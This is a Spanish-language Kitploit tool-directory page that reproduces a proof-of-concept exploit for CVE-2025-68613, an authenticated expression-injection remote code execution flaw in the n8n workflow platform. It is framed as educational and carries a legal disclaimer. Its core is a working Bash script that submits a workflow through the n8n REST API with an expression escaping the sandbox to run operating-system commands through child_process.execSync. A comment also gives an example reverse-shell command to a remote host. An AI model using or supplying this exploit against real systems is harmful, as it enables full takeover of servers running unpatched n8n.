Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613 — Exploit de Prueba de Concepto para CVE-2025-68613: Ejecución Remota de Código Autenticada en n8n mediante Expression Injection | Kitploit
Herramientas/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

Exploit de Prueba de Concepto para CVE-2025-68613: Ejecución Remota de Código Autenticada en n8n mediante Expression Injection

Ver Repositorio
22hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

n8n Inyección de Expresiones Autenticada RCE – CVE-2025-68613

Ejecución Remota de Código Crítica (CVSS 9.9) en la Herramienta de Automatización de Flujos de Trabajo n8n
Prueba de Concepto – Solo para fines educativos e investigación de seguridad autorizada


⚠️ Advertencia Legal Importante

Este código se proporciona ESTRICTAMENTE para fines educativos y pruebas de seguridad autorizadas en entornos de laboratorio controlados.

El uso no autorizado en sistemas de producción o cualquier sistema sin permiso explícito por escrito es ilegal y viola las leyes de uso indebido de computadoras y ciberseguridad en la mayoría de las jurisdicciones.

Úselo bajo su propio riesgo. El autor no es responsable por ningún uso indebido.


Información de la Vulnerabilidad

CampoDetalles
Título del Exploitn8n Inyección de Expresiones Autenticada para Ejecución Remota de Código
CVECVE-2025-68613
Fecha de Divulgación2025-12-25
AutorMohammed Idrees Banyamer
País del AutorJordania
Contacto / Redes SocialesInstagram: @banyamer_security
GitHubmbanyamer
Proveedorn8n.io
Repositorio del Softwaregithub.com/n8n-io/n8n
Versiones Vulnerables≥ 0.211.0 < 1.120.4
Versiones Parcheadas1.120.4, 1.121.1, 1.122.0 y superiores
Probado enn8n 1.119.3 (Docker)
Tipo de VulnerabilidadEjecución Remota de Código Autenticada mediante Escape del Sandbox de Expresiones
Puntuación CVSS9.9 (Crítica)

Descripción

Esta vulnerabilidad permite a un usuario autenticado crear o modificar flujos de trabajo utilizando expresiones maliciosas que eluden el sandbox de expresiones de n8n, resultando en la ejecución completa de comandos del sistema operativo con los privilegios del proceso n8n.


Prueba de Concepto – Script de Exploit en Bash

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
Descargar herramienta